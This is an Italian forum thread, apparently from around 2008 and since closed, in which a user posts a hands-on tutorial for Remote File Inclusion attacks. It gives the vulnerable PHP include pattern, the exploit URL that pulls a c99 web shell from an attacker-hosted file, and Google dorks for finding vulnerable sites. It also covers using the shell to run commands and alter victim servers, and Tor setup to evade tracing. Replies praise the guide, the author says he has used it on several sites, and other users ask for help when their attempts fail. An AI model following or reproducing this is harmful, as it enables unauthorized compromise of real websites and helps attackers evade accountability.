• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!
Stato
Discussione chiusa ad ulteriori risposte.

Coogle007

Utente Assiduo
Autore del topic
30 Maggio 2008
736
0
Miglior risposta
0
Buon pomeriggio ragazzi miei sono qui per spiegarvi la noble altre dell'rfi ovvero in inglese Remote File Inclusion per i 4 in inglese Inclusione Remota di File.
Il nome dice tutto questa tecnica permette di includere file di qualsiasi tipo all'interno di un server tutto questo da remoto.

Premetto che tutto questo è assolutamente illegale e io e sciax2 forum non ci prendiamo la responsabilità di quello che farete di questa guida tutto a solo scopo informativo.

Tornando a noi per quelli lenti a capire e che l'unica cosa che sanno fare a pc e giocare a spider lo dico più semplicemente:"Mettere qualsiasi cosa che c'è sul vostro pc dentro a un sito XD"

Allora Iniziamo con la teoria

Il remote file inclusion sfrutta le variabili non controllate nelle pagine web dinamiche

Esempio:index.php?pag=prova.php

$variabile1=$_GET[’pag‘];
include($variabile1);

cosa è sto coso?

E' un codice PHP

Questo "coso" assegna il valore prova.php alla variabile e tramite la funzione include
la include nella pagina

Sempre per gli spider boy

Sto coso assegna a variabile1 prova.php e tramite include lo mette nella pagina che vedi.

Come si sfrutta sto "coso"?

Ammetiamo che abbiamo uno script Php hostato su un sito e l'indirizzo dello script e per esempio
Perfavore, Entra oppure Registrati per vedere i Link!

Attenzione lo script quando lo hostate salvatolo non in php ma in un altro formato va bene qualunque da .jpg a .gif passando per .dat ecc.....

Per includerlo nella pagna web basta fare cosi

index.php?pag=http://sitodelcaz.com/scriptdellam.txt

Et voilà avete incluso il vostro script :emoji_smiley:

Si può includere qualsiasi script in php ma a noi interessa uppare delle shell

Per gli spider boy

Allora abbiamo un coso .php messo su un sito tipo altervista e per andare a sto coso si va su
perchè txt? perchè senno il coso va sul sito dove è hostato mentre a noi interessa che venga fatto andare su quello della vittima.

per includerlo nel sito si fa cosi

esempio:index.php?pag=http://sitodelc.com/script.txt

Et voilà avete incluso il vostro scritp

Veniamo a noi

Le shell

Partiamo dal presupposto che non sono conchiglie le shell ovvero sigifica concoglia ma non mettiamo le conchiglie sui server XD

Le shell sono degli script con cui si puo uppare cancellare e fare ciò che caspito si vuole sul server dove è hostata

Le più famose sono la c99 e la r57 noi usiamo la c99 e migliore e a me piace di più ù_ù

Allora l'utilizzo delle shell e semplicissimo una grafica intuitivapossiamo esplorare tutto quello che c'è s server e includere file

Ecco uno screen

rfi-c99.jpg

Come potete vedere la cosa è semplice è scritto in inglese ma e estremamente intuitivo

In alto vedete le informazioni del server poi le varie cartelle

E alla fine il blocco command execute li potere far eseguire comandi al server fare nuove directory cancellarle modifcare pagine insomma il server e in mani vostre.

Spider boy

Allora questa shell server per fare tutto quello che vuoi sul server esegui comandi cancelli le cose metti le cose dal tuo pc sul server insomma puoi fare quello che casputi ti pare

Andiamo avanti

Come trovare siti vulnerabili?

Eh!

Qui viene in aiuto niente poco di meno che zio google!!!

Con le sue fantasmagoriche dork

quella che ci interessa a noi
è
inurl:index.php?page=

allora cercate questo con google e troverete diversi risultati li applicate il metodo descritto spra se esce un errore cambiate sito se invece vediet apparire la shell be avete fatto.

Alcuni consigli su dork

._____________________________________________________.
| Bug | Dork |
|—————————————————–.
| index.php?x= | inurl:”index.php?x=*.php” |
| index.php?nic= | inurl:”index.php?nic=*.php” |
| homepage.php?sel= | inurl:”homepage.php?sel=*.php” |
| index.php?sel= | inurl:”index.php?sel=*.php” |
| main.php?x= | inurl:”main.php?x=*.php” |
| index2.php?x= | inurl:index2.php?x=*.php” |
| main.php?pagina= | inurl:”main.php?pagina=*.php” |
| test.php?page= | inurl:test.php?page= |
|___________________|_________________________________|

Ecco qui sbizzaretivi voi :emoji_smiley:

Tutto questo mi sembra ovvio che bisogna farlo proxato se non volete finire in guai seri

Guida nella guida

Come proxarsi

Allora scaricate tor da qui

Installatelo fate partire privoxy e Vidalia bundle aspettate che la cipolla in tray icon diventi verde

Bene tor e pronto passiamo alla configurazione del broswer

Il mio consiglio e di usare firefox

Scaricate firefox se non lo avete scaricate l'estensione tor button esce inclusa nell'instalalzione

Installatele in firefox

e al riavvio trverete nella barra sotto di firefox una scritta rossa cliccatela diventerà verde

Bene siete proxati per verificare

Andate con due broswer uno mozilla proxato e uno non proxato su ilmioip.it

Verificate se sono due ip diffferenti se sono differenti seiet proxati al lavoro!

ATTENZIONE SE SUL SITO CI SONO CONTENUTI JAVA E FLASH PROXASRI NON SERVER PERCHE' QUEI COMPONENTI PRENDONO IL VOSTRO IP

PER EVITARE QUESTO SCARICATE L'ESTENSIONE PER FIREFOX NO SCRIPT E ATTIVATELA

Fonte MIA
Screen Google

Spero di esservi stato utile scusate per le parolacce ma cosi si capisce meglio spero meriti il rilievo

:emoji_smiley:

Alla prossima

Attenzione che per fare inclusione di file remoti bisogna che sia abilitato in Apache allow_url_open altrimenti non si possono fare inclusioni remote. Su AlterVista e la magigor parte degli hosting gratuiti è disattivato. Al posto di usare un include si potrebbero usare le librerie CURL o fsockopen.

Ma se volete farlo per bene fatelo sugli hosting a pagamento XD

Dimenticavo guida apporvata da chuck norris

image004.jpg

Ultima modifica:
Segnalo per linguaggio offensivo Cmq bella guida si merita il rilievo

Ultima modifica:
Attenzione che per fare inclusione di file remoti bisogna che sia abilitato in Apache allow_url_open altrimenti non si possono fare inclusioni remote. Su AlterVista e la magigor parte degli hosting gratuiti è disattivato. Al posto di usare un include si potrebbero usare le librerie CURL o fsockopen.

Non lo metto ora lo metto nella guida ma guarda lo fatto su 5 6 siti comq se il rilevate :emoji_relieved:

Ok :emoji_relieved: era per fa comprendere XD
--------------- AGGIUNTA AL POST ---------------
Eliminate parolacce solo una ne ho messa :emoji_relieved:

Ultima modifica:
Bello xD Avevo usato una volta sto metodo su un retro,
Su habbo nn ci voglio provare xD

goocle nn ho capito molto bene come funziona praticamente io ho messo la shell c99 su un mio host altrevista inseguito ho trovato un sito in cui e prensente
index.php?page=...
dopodiche inserisco

e nn mi compare la schermata della shell ma bensi il sito ricaricato o.O

goocle nn ho capito molto bene come funziona praticamente io ho messo la shell c99 su un mio host altrevista inseguito ho trovato un sito in cui e prensente
index.php?page=...
dopodiche inserisco

e nn mi compare la schermata della shell ma bensi il sito ricaricato o.O

Stesso problema mio. :soso: Puoi cercare di spiegarcelo ?

Elimino il rilievo del topic poichè c'è da tempo un topic di Abe in rilievo,sposto e chiudo.

Stato
Discussione chiusa ad ulteriori risposte.